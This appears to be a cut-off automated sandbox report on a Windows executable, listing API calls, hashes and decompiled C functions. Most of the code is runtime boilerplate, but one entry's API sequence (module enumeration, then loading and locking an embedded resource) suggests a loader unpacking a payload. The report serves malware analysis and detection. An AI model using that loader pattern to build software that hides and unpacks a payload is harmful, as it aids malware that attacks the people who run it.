                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c9c
                                                                                                                                                                                          0x00401c9c
                                                                                                                                                                                          0x00401c9d
                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c9a
                                                                                                                                                                                          0x00401c93
                                                                                                                                                                                          0x00401c95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c95
                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                          0x00000000

APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
• Module32Next.KERNEL32 ref: 00401D02
• Module32Next.KERNEL32 ref: 00401DB6
• FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPXs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                          • API String ID: 2366190142-2853427038
                                                                                                                                                                                          • Opcode ID: 135b7a2c8b10f9b65b3a7f6fe368769bd920b2b492654d20624e3bc9a208dfdf
                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 135b7a2c8b10f9b65b3a7f6fe368769bd920b2b492654d20624e3bc9a208dfdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 84%
E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
	void* __ebx;
	void* __ebp;
	signed int _t12;
	char** _t17; /* receives __ecx; declaration missing in the decompiler output */
	void* _t21;
	int _t25;
	void* _t30;
	int _t32;
	char* _t35;

	_t21 = __edx;
	_t35 = _a4;
	_t17 = __ecx;
	if(_t35 != 0) {
		_t25 = lstrlenA(_t35) + 1; /* length of the ANSI input including the terminator */
		E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
		_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
		asm("sbb esi, esi");
		_t30 =  ~_t12 + 1; /* non-zero when the conversion returned 0 (failure) */
		if(_t30 != 0) {
			_t12 = GetLastError();
			if(_t12 == 0x7a) { /* ERROR_INSUFFICIENT_BUFFER: query required size and retry */
				_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
				E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
				_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
				asm("sbb esi, esi");
				_t30 =  ~_t12 + 1;
			}
			if(_t30 != 0) {
				_t12 = E00401030();
			}
		}
		return _t12;
	} else {
		 *__ecx = _t35;
		return __eax;
	}
}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                                          • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___crtCorExitProcess.LIBCMT ref: 0040E7F6
  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
• ExitProcess.KERNEL32 ref: 0040E7FF
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
• Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
Uniqueness

Uniqueness Score: -1.00%

APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
Uniqueness

Uniqueness Score: -1.00%

APIs
• _doexit.LIBCMT ref: 0040EA16
  • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: __decode_pointer$__initterm$__lock_doexit
• String ID:
• API String ID: 1597249276-0
• Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
• Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3374b8a112f4b9dbab445f211546730d874fcce9c687055d4a45a5890a911f04
• Instruction ID: d54602e627a9cfead3b55359874649844e6c529163353671f0f15c6d3b14db07
• Opcode Fuzzy Hash: 3374b8a112f4b9dbab445f211546730d874fcce9c687055d4a45a5890a911f04
• Instruction Fuzzy Hash: 2C21F2B5544240DFEF04CF24D8C4B6BFBA5FB84324F24C9AAE8094B696D336D806DA61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dcce79a50bd3b9828027b8d400509b922958f1b7bb726631bf2c493dd28a9f78
• Instruction ID: 1eaf3432ad065fc3df45eaa918903927e8434645d9e4be361ceed3113f68c9b3
• Opcode Fuzzy Hash: dcce79a50bd3b9828027b8d400509b922958f1b7bb726631bf2c493dd28a9f78
• Instruction Fuzzy Hash: 2621F975545340DFEF00DF14D5C4B5AFBA5FB84328F24C96AD8494B646C336E805D761
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a47bfe4a6bcf5fbe28d2fe1ba74eb04fc99507f7a93f0834f9ae9777d6a011be
• Instruction ID: 133afb4dcff2d733aecad27d377c5f66927c817b7ab4ab76855b5daf2546361f
• Opcode Fuzzy Hash: a47bfe4a6bcf5fbe28d2fe1ba74eb04fc99507f7a93f0834f9ae9777d6a011be
• Instruction Fuzzy Hash: DB11BE79544280DFDB01CF14D9C4B16FFA1FB84224F28C6AAD8494B696C33AD40ACB61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e53ffd709b012e936f9f2aa6718087a60dd889b8a1e82929efd72d2b2caa1cb9
• Instruction ID: a83ad0c5c86fff735b0569d27dec8abf9385e0a95b30531bc94c6a5be0f52a02
• Opcode Fuzzy Hash: e53ffd709b012e936f9f2aa6718087a60dd889b8a1e82929efd72d2b2caa1cb9
• Instruction Fuzzy Hash: FF119D75545280DFDF11DF14D5C4B15FFA1FB84324F28C6AAD8484B656C33AE41ACBA2
Uniqueness

Uniqueness Score: -1.00%
Non-executed Functions

C-Code - Quality: 85%
                                                                                                                                                                                          			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                          				void* _v804;
                                                                                                                                                                                          				intOrPtr _v808;
                                                                                                                                                                                          				intOrPtr _v812;
                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                          				long _t17;
                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                          				_t6 = __eax;
                                                                                                                                                                                          				_t34 = _t22 -  *0x422234; // 0x4c5fa4f
        if(_t34 == 0) {
            asm("repe ret");
        }
        *0x423b98 = _t6;
        *0x423b94 = _t22;
        *0x423b90 = _t25;
        *0x423b8c = _t21;
        *0x423b88 = _t27;
        *0x423b84 = _t26;
        *0x423bb0 = ss;
        *0x423ba4 = cs;
        *0x423b80 = ds;
        *0x423b7c = es;
        *0x423b78 = fs;
        *0x423b74 = gs;
        asm("pushfd");
        _pop(*0x423ba8);
        *0x423b9c = *_t31;
        *0x423ba0 = _v0;
        *0x423bac = &_a4;
        *0x423ae8 = 0x10001;
        _t11 = *0x423ba0; // 0x0
        *0x423a9c = _t11;
        *0x423a90 = 0xc0000409;
        *0x423a94 = 1;
        _t12 = *0x422234; // 0x4c5fa4f
        _v812 = _t12;
        _t13 = *0x422238; // 0xfb3a05b0
        _v808 = _t13;
        *0x423ae0 = IsDebuggerPresent();
        _push(1);
        E004138FC(_t14);
        SetUnhandledExceptionFilter(0);
        _t17 = UnhandledExceptionFilter(0x41fb80);
        if(*0x423ae0 == 0) {
            _push(1);
            E004138FC(_t17);
        }
        return TerminateProcess(GetCurrentProcess(), 0xc0000409);
    }


APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
• Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
• Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
• Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID:
• String ID: @$@
• API String ID: 0-149943524
• Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
• Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
• Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
• Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32 ref: 0040ADD0
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
• Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
• Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
• Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
• Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
• Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
• Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
• Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
• Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                                          • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                                                          • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                                                                                                                                          • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                                          • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                                                                          • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                                          • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                                          • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                                          • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
